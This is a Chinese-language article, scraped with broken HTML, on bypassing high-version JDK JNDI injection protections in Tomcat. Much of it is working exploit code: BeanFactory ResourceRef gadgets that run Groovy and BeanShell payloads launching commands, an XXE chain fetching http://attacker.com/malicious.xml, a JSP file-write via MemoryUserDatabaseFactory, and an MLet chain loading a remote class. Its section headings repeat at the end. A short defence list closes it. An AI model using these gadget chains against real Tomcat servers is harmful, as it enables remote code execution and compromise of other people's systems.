Tomcat下JNDI高版本绕过技术分析与利用指南<\/h1>

一、背景与概述<\/h2>
在Log4j漏洞事件后，JNDI注入漏洞利用研究成为热点。高版本JDK对JNDI注入进行了防护限制，本文深入分析Tomcat环境下绕过这些限制的技术方法。<\/p>

二、JNDI高版本防护机制<\/h2>

高版本JDK主要防护机制：<\/p>

限制远程ObjectFactory的加载<\/li>
仅当开启特定属性时才允许从远程地址获取ObjectFactory<\/li>

加载顺序：先本地ClassPath → 失败后才加载远程<\/li> <\/ul>

关键代码逻辑：<\/p>

static<\/span> ObjectFactory getObjectFactoryFromReference<\/span>(<\/span>Reference ref,<\/span> String factoryName)<\/span> {<\/span>
<\/span><\/span>    \/\/ 首先加载当前环境下ClassPath下的ObjectFactory
<\/span><\/span><\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        clas =<\/span> helper.<\/span>loadClass<\/span>(<\/span>factoryName);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>ClassNotFoundException e)<\/span> {<\/span>
<\/span><\/span>        \/\/ 当前ClassPath加载失败才会加载classFactoryLocation中指定地址的ObjectFactory
<\/span><\/span><\/span><\/span>        if<\/span> (<\/span>clas ==<\/span> null<\/span> &&<\/span> (<\/span>codebase =<\/span> ref.<\/span>getFactoryClassLocation<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            clas =<\/span> helper.<\/span>loadClass<\/span>(<\/span>factoryName,<\/span> codebase);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> (<\/span>clas !=<\/span> null<\/span>)<\/span> ?<\/span> (<\/span>ObjectFactory)<\/span> clas.<\/span>newInstance<\/span>()<\/span> :<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>三、绕过思路与技术实现<\/h2>
1. 核心绕过思路<\/h3>
寻找javax.naming.spi.ObjectFactory<\/code>接口的实现类，利用其getObjectInstance<\/code>方法执行恶意操作。在Tomcat中，BeanFactory#getObjectInstance<\/code>提供了扩展利用面。<\/p>
调用限制条件：<\/p>

类必须包含public无参构造方法<\/li>
调用的方法必须是public方法<\/li>
方法只能有一个String类型参数<\/li>
<\/ol>
2. 常规绕过方法<\/h3>
(1) 直接命令执行方式<\/h4>



类与方法<\/th>
说明<\/th>
适用环境<\/th>
<\/tr>
<\/thead>


javax.el.ELProcessor#eval<\/code><\/td>
执行EL表达式<\/td>
Tomcat8+<\/td>
<\/tr>

groovy.lang.GroovyShell#evaluate<\/code><\/td>
执行Groovy命令<\/td>
需Groovy环境<\/td>
<\/tr>

org.mvel2.MVEL#eval<\/code><\/td>
执行MVEL表达式<\/td>
MVEL 2.0.17及以下<\/td>
<\/tr>

org.mvel2.sh.ShellSession#exec<\/code><\/td>
间接调用MVEL<\/td>
MVEL高版本<\/td>
<\/tr>

bsh.Interpreter#eval<\/code><\/td>
执行BeanShell命令<\/td>
需BeanShell环境<\/td>
<\/tr>
<\/tbody>
<\/table>
(2) 反序列化利用方式<\/h4>



类与方法<\/th>
说明<\/th>
依赖组件<\/th>
<\/tr>
<\/thead>


com.thoughtworks.xstream.XStream#fromXML<\/code><\/td>
XStream反序列化<\/td>
XStream<\/td>
<\/tr>

org.yaml.snakeyaml.Yaml#load<\/code><\/td>
Yaml反序列化<\/td>
SnakeYAML<\/td>
<\/tr>
<\/tbody>
<\/table>
(3) 其他利用方式<\/h4>



类与方法<\/th>
说明<\/th>
限制条件<\/th>
<\/tr>
<\/thead>


com.sun.glass.utils.NativeLibLoader#loadLibrary<\/code><\/td>
加载DLL<\/td>
需提前上传DLL<\/td>
<\/tr>

org.apache.catalina.users.MemoryUserDatabaseFactory<\/code><\/td>
XXE+文件写入<\/td>
Tomcat特定版本<\/td>
<\/tr>
<\/tbody>
<\/table>
3. 关键利用链分析<\/h3>
(1) MVEL调用链挖掘<\/h4>
CodeQL分析过程<\/strong>：<\/p>
\/**
 * @name Tainttrack Context lookup 
 * @kind path-problem
 *\/
import java
import semmle.code.java.dataflow.FlowSources
import DataFlow::PathGraph

class MVEL extends RefType{
    MVEL(){
        this.hasQualifiedName("org.mvel2", "MVEL")
    }
}

class CallEval extends Method {
    CallEval(){
        this.getNumberOfParameters() = 1 and 
        this.getParameter(0).getType() instanceof TypeString
    }
    Parameter getAnUntrustedParameter() { result = this.getParameter(0) }
}

predicate isEval(Expr arg) {
    exists(MethodAccess ma | 
        ma.getMethod().getName()="eval" and 
        ma.getMethod().getDeclaringType() instanceof MVEL and 
        arg = ma.getArgument(0)
    )
}

class TainttrackLookup extends TaintTracking::Configuration {
    TainttrackLookup() { this = "TainttrackLookup" }
    
    override predicate isSource(DataFlow::Node source) {
        exists(CallEval evalMethod | 
            source.asParameter() = evalMethod.getAnUntrustedParameter()
        )
    }
    
    override predicate isSink(DataFlow::Node sink) {
        exists(Expr arg | isEval(arg) and sink.asExpr() = arg )
    }
    
    override predicate isAdditionalTaintStep(DataFlow::Node fromNode, DataFlow::Node toNode) {
        exists(MethodAccess ma,MethodAccess ma2 | 
            ma.getMethod().getDeclaringType().hasQualifiedName("java.lang", "System") and 
            ma.getMethod().hasName("arraycopy") and 
            fromNode.asExpr()=ma.getArgument(0) and 
            ma2.getMethod().getDeclaringType().hasQualifiedName("org.mvel2.sh", "Command") and 
            ma2.getMethod().hasName("execute") and 
            toNode.asExpr()=ma2.getArgument(1)
        )
    }
}
<\/code><\/pre>
(2) GroovyClassLoader利用<\/h4>
直接执行Groovy代码<\/strong>：<\/p>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"groovy.lang.GroovyClassLoader"<\/span>,<\/span> null<\/span>,<\/span> 
<\/span><\/span>    true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=parseClass"<\/span>));<\/span>
<\/span><\/span>String script =<\/span> "@groovy.transform.ASTTest(value={\n"<\/span> +<\/span>
<\/span><\/span>    " assert java.lang.Runtime.getRuntime().exec(\"calc\")\n"<\/span> +<\/span>
<\/span><\/span>    "})\n"<\/span> +<\/span>
<\/span><\/span>    "def x\n"<\/span>;<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> script));<\/span>
<\/span><\/span><\/code><\/pre>(3) BeanShell利用<\/h4>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"bsh.Interpreter"<\/span>,<\/span> null<\/span>,<\/span>
<\/span><\/span>    true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "a=eval"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"a"<\/span>,<\/span> "exec(\"cmd.exe \/c calc.exe\")"<\/span>));<\/span>
<\/span><\/span>return<\/span> ref;<\/span>
<\/span><\/span><\/code><\/pre>4. MemoryUserDatabaseFactory利用链<\/h3>
(1) XXE漏洞利用<\/h4>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"org.apache.catalina.UserDatabase"<\/span>,<\/span> null<\/span>,<\/span>
<\/span><\/span>    true<\/span>,<\/span> "org.apache.catalina.users.MemoryUserDatabaseFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"pathname"<\/span>,<\/span> "http:\/\/attacker.com\/malicious.xml"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"readonly"<\/span>,<\/span> "false"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>(2) 文件写入RCE<\/h4>
Tomcat7利用<\/strong>：<\/p>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><tomcat-users<\/span> xmlns=<\/span>"http:\/\/tomcat.apache.org\/xml"<\/span>
<\/span><\/span>              xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span>
<\/span><\/span>              xsi:schemaLocation=<\/span>"http:\/\/tomcat.apache.org\/xml tomcat-users.xsd"<\/span>
<\/span><\/span>              version=<\/span>"1.0"<\/span>><\/span>
<\/span><\/span>    <role<\/span> rolename=<\/span>"<%Runtime.getRuntime().exec(\"<\/span>calc.exe\")%<\/span>><\/span>"\/>
<\/span><\/span><\/tomcat-users><\/span>
<\/span><\/span><\/code><\/pre>利用代码<\/strong>：<\/p>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"org.apache.catalina.UserDatabase"<\/span>,<\/span> null<\/span>,<\/span>
<\/span><\/span>    true<\/span>,<\/span> "org.apache.catalina.users.MemoryUserDatabaseFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"pathname"<\/span>,<\/span> "http:\/\/127.0.0.1:8888\/..\/..\/webapps\/ROOT\/test.jsp"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"readonly"<\/span>,<\/span> "false"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>四、BeanFactory多方法调用机制<\/h2>
1. 调用流程分析<\/h3>

从Reference对象获取类名并实例化（仅一次）<\/li>
从forceString属性获取方法列表（逗号分隔）<\/li>
遍历方法列表，解析方法名（支持method=alias<\/code>格式）<\/li>
通过反射获取Method对象并存入Map<\/li>
遍历Reference属性，动态调用对应方法<\/li>
<\/ol>
2. 多方法调用示例<\/h3>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.management.loading.MLet"<\/span>,<\/span> null<\/span>,<\/span>
<\/span><\/span>    true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>\/\/ 指定要调用的方法名及别名
<\/span><\/span><\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "b=addURL,c=loadClass"<\/span>));<\/span>
<\/span><\/span>\/\/ 为不同方法赋值
<\/span><\/span><\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"b"<\/span>,<\/span> "http:\/\/127.0.0.1:2333\/"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"c"<\/span>,<\/span> "ExploitClass"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>五、防御建议<\/h2>

升级JDK到最新版本<\/li>
限制JNDI查找能力<\/li>
对Tomcat等中间件进行安全加固<\/li>
监控可疑的JNDI查找行为<\/li>
移除不必要的ObjectFactory实现类<\/li>
<\/ol>
六、总结<\/h2>
本文详细分析了Tomcat环境下JNDI高版本绕过的多种技术方案，重点包括：<\/p>

通过本地ClassPath中的ObjectFactory实现类绕过<\/li>
利用BeanFactory的多方法调用机制<\/li>
多种命令执行方式（EL、Groovy、MVEL、BeanShell）<\/li>
反序列化漏洞间接利用（XStream、SnakeYAML）<\/li>
MemoryUserDatabaseFactory的XXE和文件写入利用<\/li>
<\/ol>
这些技术方案为安全研究人员提供了绕过高版本JDK限制的有效途径，同时也强调了系统加固的重要性。<\/p>

Tomcat下JNDI高版本绕过技术分析与利用指南<\/h1>

一、背景与概述<\/h2> 在Log4j漏洞事件后，JNDI注入漏洞利用研究成为热点。高版本JDK对JNDI注入进行了防护限制，本文深入分析Tomcat环境下绕过这些限制的技术方法。<\/p>

三、绕过思路与技术实现<\/h2>

2. 常规绕过方法<\/h3>

3. 关键利用链分析<\/h3>

4. MemoryUserDatabaseFactory利用链<\/h3>

四、BeanFactory多方法调用机制<\/h2>

一、背景与概述<\/h2>
在Log4j漏洞事件后，JNDI注入漏洞利用研究成为热点。高版本JDK对JNDI注入进行了防护限制，本文深入分析Tomcat环境下绕过这些限制的技术方法。<\/p>